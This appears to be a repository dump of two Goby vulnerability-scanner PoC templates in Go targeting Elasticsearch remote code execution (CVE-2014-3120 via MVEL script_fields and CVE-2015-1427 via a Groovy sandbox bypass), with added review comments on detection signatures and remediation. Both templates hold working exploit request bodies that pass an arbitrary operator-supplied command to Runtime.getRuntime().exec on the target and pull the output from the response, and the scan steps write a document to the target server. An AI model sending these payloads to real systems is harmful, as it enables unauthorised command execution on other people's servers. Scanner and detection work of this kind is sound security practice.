├── poc ├── Elasticsearch_Remote_Code_Execution_CVE_2014_3120.go └── Elasticsearch_Remote_Code_Execution_CVE_2015_1427.go └── readme.md /poc/Elasticsearch_Remote_Code_Execution_CVE_2014_3120.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "git.gobies.org/goby/goscanner/goutils" 5 | ) 6 | 7 | /*
Goby check for CVE-2014-3120: Elasticsearch before 1.2 shipped with MVEL dynamic
scripting enabled, so a _search request carrying "script_fields" could run
arbitrary Java. Everything here is data-driven: the expJson template declares the
scan and exploit request sequences and ExpManager.AddExploit registers it.

ScanSteps (detection phase):
  1. POST /website/blog/ with a small JSON document and expect HTTP 201. This is
     NOT a read-only probe: it persists a document on the target, which is also a
     forensic artifact a defender can search for after a scan.
  2. POST /_search?pretty with a script_fields entry that echoes a fixed marker
     string, and require a 200 whose body contains that marker.
ExploitSteps repeat the same pair with the "cmd" ExpParam substituted via
{{{cmd}}} and pull the "command" field out of the response with a regex.

Defensive notes: the request bodies are a reliable signature (POST /_search whose
body contains "script_fields" and Runtime.getRuntime().exec); the remediation in
the template's own text is upgrading to Elasticsearch 1.2+, where dynamic
scripting is disabled by default.
NOTE(review): "CVEIDs" is null and "CVSSScore" is "0.0" although the Name carries
the CVE id, and "DisclosureDate" appears to be the PoC's authoring date rather
than the 2014 advisory date — worth correcting so triage tooling can key on them.
*/
func init() { 8 | expJson := `{ 9 | "Name": "Elasticsearch Remote Code Execution CVE-2014-3120", 10 | "Description": "The default configuration before Elasticsearch 1.2 enabled dynamic scripting, which allowed remote attackers to execute arbitrary MVEL expressions and Java code through the source parameter of _search.", 11 | "Product": "Elasticsearch", 12 | "Homepage": "https://gobies.org/", 13 | "DisclosureDate": "2021-04-10", 14 | "Author": "zhzyker", 15 | "GobyQuery": "product=elasticsearch", 16 | "Level": "3", 17 | "Impact": "

ElasticSearch is an open source, distributed, RESTful search engine built on Lucene. Designed for use in cloud computing, it can achieve real-time, stable, reliable and fast search, and is easy to install and use. Supports data indexing via HTTP request and using JSON.

Since ElasticSearch has enabled dynamic script execution by default, any user can execute arbitrary Java code by constructing a specially crafted submission.

", 18 | "Recommandation": "

The official version of elasticsearch 1.2 has been publicly released, and the dynamic script execution function is disabled by default.

", 19 | "References": [ 20 | "https://github.com/zhzyker" 21 | ], 22 | "HasExp": true, 23 | "ExpParams": [ 24 | { 25 | "name": "cmd", 26 | "type": "input", 27 | "value": "whoami" 28 | } 29 | ], 30 | "ExpTips": { 31 | "Type": "", 32 | "Content": "" 33 | }, 34 | "ScanSteps": [ 35 | "AND", 36 | { 37 | "Request": { 38 | "method": "POST", 39 | "uri": "/website/blog/", 40 | "follow_redirect": true, 41 | "header": { 42 | "Accept-Encoding": "gzip, deflate", 43 | "Accept": "*/*", 44 | "Connection": "close", 45 | "Accept-Language": "en", 46 | "Content-Type": "application/x-www-form-urlencoded" 47 | }, 48 | "data_type": "text", 49 | "data": "{ \"name\": \"cve-2014-3120\" }" 50 | }, 51 | "ResponseTest": { 52 | "type": "group", 53 | "operation": "AND", 54 | "checks": [ 55 | { 56 | "type": "item", 57 | "variable": "$code", 58 | "operation": "==", 59 | "value": "201", 60 | "bz": "http_code" 61 | } 62 | ] 63 | }, 64 | "SetVariable": [] 65 | }, 66 | { 67 | "Request": { 68 | "method": "POST", 69 | "uri": "/_search?pretty", 70 | "follow_redirect": true, 71 | "header": { 72 | "Accept-Encoding": "gzip, deflate", 73 | "Accept": "*/*", 74 | "Connection": "close", 75 | "Accept-Language": "en", 76 | "Content-Type": "application/x-www-form-urlencoded" 77 | }, 78 | "data_type": "text", 79 | "data": "{\"size\":1,\"query\":{\"filtered\":{\"query\":{\"match_all\":{}}}},\"script_fields\":{\"command\":{\"script\":\"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"echo 0d455d3d2044e6e7781771d932e68dbc_goby_nb\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"}}}" 80 | }, 81 | "ResponseTest": { 82 | "type": "group", 83 | "operation": "AND", 84 | "checks": [ 85 | { 86 | "type": "item", 87 | "variable": "$code", 88 | "operation": "==", 89 | "value": "200", 90 | "bz": "" 91 | }, 92 | { 93 | "type": "item", 94 | "variable": "$body", 95 | "operation": "contains", 96 | "value": "0d455d3d2044e6e7781771d932e68dbc", 97 | "bz": "" 98 | } 99 | ] 100 | }, 101 | "SetVariable": 
[] 102 | } 103 | ], 104 | "ExploitSteps": [ 105 | "AND", 106 | { 107 | "Request": { 108 | "method": "POST", 109 | "uri": "/website/blog/", 110 | "follow_redirect": true, 111 | "header": { 112 | "Accept-Encoding": "gzip, deflate", 113 | "Accept": "*/*", 114 | "Connection": "close", 115 | "Accept-Language": "en", 116 | "Content-Type": "application/x-www-form-urlencoded" 117 | }, 118 | "data_type": "text", 119 | "data": "{ \"name\": \"cve-2014-3120\" }" 120 | }, 121 | "ResponseTest": { 122 | "type": "group", 123 | "operation": "AND", 124 | "checks": [ 125 | { 126 | "type": "item", 127 | "variable": "$code", 128 | "operation": "==", 129 | "value": "201", 130 | "bz": "http_code" 131 | } 132 | ] 133 | }, 134 | "SetVariable": [ 135 | "output|lastbody" 136 | ] 137 | }, 138 | { 139 | "Request": { 140 | "method": "POST", 141 | "uri": "/_search?pretty", 142 | "follow_redirect": true, 143 | "header": { 144 | "Accept-Encoding": "gzip, deflate", 145 | "Accept": "*/*", 146 | "Connection": "close", 147 | "Accept-Language": "en", 148 | "Content-Type": "application/x-www-form-urlencoded" 149 | }, 150 | "data_type": "text", 151 | "data": "{\"size\":1,\"query\":{\"filtered\":{\"query\":{\"match_all\":{}}}},\"script_fields\":{\"command\":{\"script\":\"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"{{{cmd}}}\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"}}}" 152 | }, 153 | "ResponseTest": { 154 | "type": "group", 155 | "operation": "AND", 156 | "checks": [ 157 | { 158 | "type": "item", 159 | "variable": "$code", 160 | "operation": "==", 161 | "value": "200", 162 | "bz": "http_code" 163 | } 164 | ] 165 | }, 166 | "SetVariable": [ 167 | "output|lastbody|regex|(?s)\"command\" : (.*)}" 168 | ] 169 | } 170 | ], 171 | "Tags": [ 172 | "RCE" 173 | ], 174 | "CVEIDs": null, 175 | "CVSSScore": "0.0", 176 | "AttackSurfaces": { 177 | "Application": null, 178 | "Support": null, 179 | "Service": null, 180 | "System": null, 181 | "Hardware": null 182 | } 183 | }` 
184 | 185 | /* Register the template under this source file's name. The two nil arguments presumably mean no custom Go scan/exploit callbacks, i.e. all behaviour comes from expJson — confirm against NewExploit's signature. */ ExpManager.AddExploit(NewExploit( 186 | goutils.GetFileName(), 187 | expJson, 188 | nil, 189 | nil, 190 | )) 191 | } 192 | -------------------------------------------------------------------------------- /poc/Elasticsearch_Remote_Code_Execution_CVE_2015_1427.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "git.gobies.org/goby/goscanner/goutils" 5 | ) 6 | 7 | /*
Goby check for CVE-2015-1427: the Groovy sandbox in Elasticsearch before 1.3.8 and
in 1.4.x before 1.4.3 could be bypassed; the template below does so through a
"lang":"groovy" script_fields entry that reaches java.lang.Runtime via
java.lang.Math.class.forName(...). The structure mirrors the CVE-2014-3120
template in this package: ScanSteps first write a document to /website/blog/
(HTTP 201 expected — a persistent artifact on the target, not a read-only probe)
and then run a _search whose script echoes a fixed marker, requiring a 200 whose
body contains it; ExploitSteps substitute the "cmd" ExpParam via {{{cmd}}} and
extract the "lupin" field with a regex. One visible difference from the sibling
file: the _search requests send Content-Type application/text rather than
application/x-www-form-urlencoded.

Defensive notes: alert on POST /_search bodies containing "lang":"groovy"
together with class.forName or Runtime; the template's own Recommandation text
gives the mitigation (script.groovy.sandbox.enabled: false), and upgrading to a
fixed release removes the bypass.
NOTE(review): as in the sibling file, "CVEIDs" is null and "CVSSScore" is "0.0"
although the Name carries the CVE id.
*/
func init() { 8 | expJson := `{ 9 | "Name": "Elasticsearch Remote Code Execution CVE-2015-1427", 10 | "Description": "The Groovy script engine before Elasticsearch 1.3.8 and the Groovy script engine in 1.4.x before 1.4.3 allow remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands through elaborate scripts.", 11 | "Product": "Elasticsearch", 12 | "Homepage": "https://www.elastic.co/cn/elasticsearch/", 13 | "DisclosureDate": "2021-04-11", 14 | "Author": "zhzyker", 15 | "GobyQuery": "product=elasticsearch", 16 | "Level": "3", 17 | "Impact": "

In 2014, a remote code execution vulnerability (CVE-2014-3120) was exposed. The vulnerability appeared in the script query module. Since search engines support the use of script code (MVEL) as an expression for data manipulation, attackers can use MVEL Construct and execute arbitrary java code,

Later, the scripting language engine was changed to Groovy and a sandbox was added to control it. Dangerous codes would be intercepted. As a result, this time because the sandbox restrictions were not strict, it led to remote code execution.

", 18 | "Recommandation": "

Close the groovy sandbox to stop the use of dynamic scripts:

script.groovy.sandbox.enabled: false
", 19 | "References": [ 20 | "https://github.com/zhzyker" 21 | ], 22 | "HasExp": true, 23 | "ExpParams": [ 24 | { 25 | "name": "cmd", 26 | "type": "input", 27 | "value": "whoami" 28 | } 29 | ], 30 | "ExpTips": { 31 | "Type": "", 32 | "Content": "" 33 | }, 34 | "ScanSteps": [ 35 | "AND", 36 | { 37 | "Request": { 38 | "method": "POST", 39 | "uri": "/website/blog/", 40 | "follow_redirect": true, 41 | "header": { 42 | "Accept-Encoding": "gzip, deflate", 43 | "Accept": "*/*", 44 | "Connection": "close", 45 | "Accept-Language": "en", 46 | "Content-Type": "application/x-www-form-urlencoded" 47 | }, 48 | "data_type": "text", 49 | "data": "{ \"name\": \"cve-2015-1427\" }" 50 | }, 51 | "ResponseTest": { 52 | "type": "group", 53 | "operation": "AND", 54 | "checks": [ 55 | { 56 | "type": "item", 57 | "variable": "$code", 58 | "operation": "==", 59 | "value": "201", 60 | "bz": "" 61 | } 62 | ] 63 | }, 64 | "SetVariable": [] 65 | }, 66 | { 67 | "Request": { 68 | "method": "POST", 69 | "uri": "/_search?pretty", 70 | "follow_redirect": true, 71 | "header": { 72 | "Accept-Encoding": "gzip, deflate", 73 | "Accept": "*/*", 74 | "Connection": "close", 75 | "Accept-Language": "en", 76 | "Content-Type": "application/text" 77 | }, 78 | "data_type": "text", 79 | "data": "{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"echo 460f7ccb583e25e09c0fe100a2c9e90d\\\").getText()\"}}}" 80 | }, 81 | "ResponseTest": { 82 | "type": "group", 83 | "operation": "AND", 84 | "checks": [ 85 | { 86 | "type": "item", 87 | "variable": "$code", 88 | "operation": "==", 89 | "value": "200", 90 | "bz": "" 91 | }, 92 | { 93 | "type": "item", 94 | "variable": "$body", 95 | "operation": "contains", 96 | "value": "460f7ccb583e25e09c0fe100a2c9e90d", 97 | "bz": "" 98 | } 99 | ] 100 | }, 101 | "SetVariable": [] 102 | } 103 | ], 104 | "ExploitSteps": [ 105 | "AND", 106 | { 107 | "Request": { 108 | "method": "POST", 
109 | "uri": "/website/blog/", 110 | "follow_redirect": true, 111 | "header": { 112 | "Accept-Encoding": "gzip, deflate", 113 | "Accept": "*/*", 114 | "Connection": "close", 115 | "Accept-Language": "en", 116 | "Content-Type": "application/x-www-form-urlencoded" 117 | }, 118 | "data_type": "text", 119 | "data": "{ \"name\": \"cve-2015-1427\" }" 120 | }, 121 | "ResponseTest": { 122 | "type": "group", 123 | "operation": "AND", 124 | "checks": [ 125 | { 126 | "type": "item", 127 | "variable": "$code", 128 | "operation": "==", 129 | "value": "201", 130 | "bz": "" 131 | } 132 | ] 133 | }, 134 | "SetVariable": [ 135 | "output|lastbody" 136 | ] 137 | }, 138 | { 139 | "Request": { 140 | "method": "POST", 141 | "uri": "/_search?pretty", 142 | "follow_redirect": true, 143 | "header": { 144 | "Accept-Encoding": "gzip, deflate", 145 | "Accept": "*/*", 146 | "Connection": "close", 147 | "Accept-Language": "en", 148 | "Content-Type": "application/text" 149 | }, 150 | "data_type": "text", 151 | "data": "{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"{{{cmd}}}\\\").getText()\"}}}" 152 | }, 153 | "ResponseTest": { 154 | "type": "group", 155 | "operation": "AND", 156 | "checks": [ 157 | { 158 | "type": "item", 159 | "variable": "$code", 160 | "operation": "==", 161 | "value": "200", 162 | "bz": "" 163 | }, 164 | { 165 | "type": "item", 166 | "variable": "$body", 167 | "operation": "contains", 168 | "value": "460f7ccb583e25e09c0fe100a2c9e90d", 169 | "bz": "" 170 | } 171 | ] 172 | }, 173 | "SetVariable": [ 174 | "output|lastbody|regex|(?s)\"lupin\" : \\[ \"(.*)\" \\]" 175 | ] 176 | } 177 | ], 178 | "Tags": [ 179 | "RCE" 180 | ], 181 | "CVEIDs": null, 182 | "CVSSScore": "0.0", 183 | "AttackSurfaces": { 184 | "Application": null, 185 | "Support": null, 186 | "Service": null, 187 | "System": null, 188 | "Hardware": null 189 | } 190 | }` 191 | 192 | 
/* Register the template under this source file's name. The two nil arguments presumably mean no custom Go scan/exploit callbacks, i.e. all behaviour comes from expJson — confirm against NewExploit's signature. */ ExpManager.AddExploit(NewExploit( 193 | goutils.GetFileName(), 194 | expJson, 195 | nil, 196 | nil, 197 | )) 198 | } -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 | # Goby-PoC 2 | 3 | ![image](https://user-images.githubusercontent.com/32918050/114302697-b855d100-9afc-11eb-8658-4f70200021df.png) 4 | --------------------------------------------------------------------------------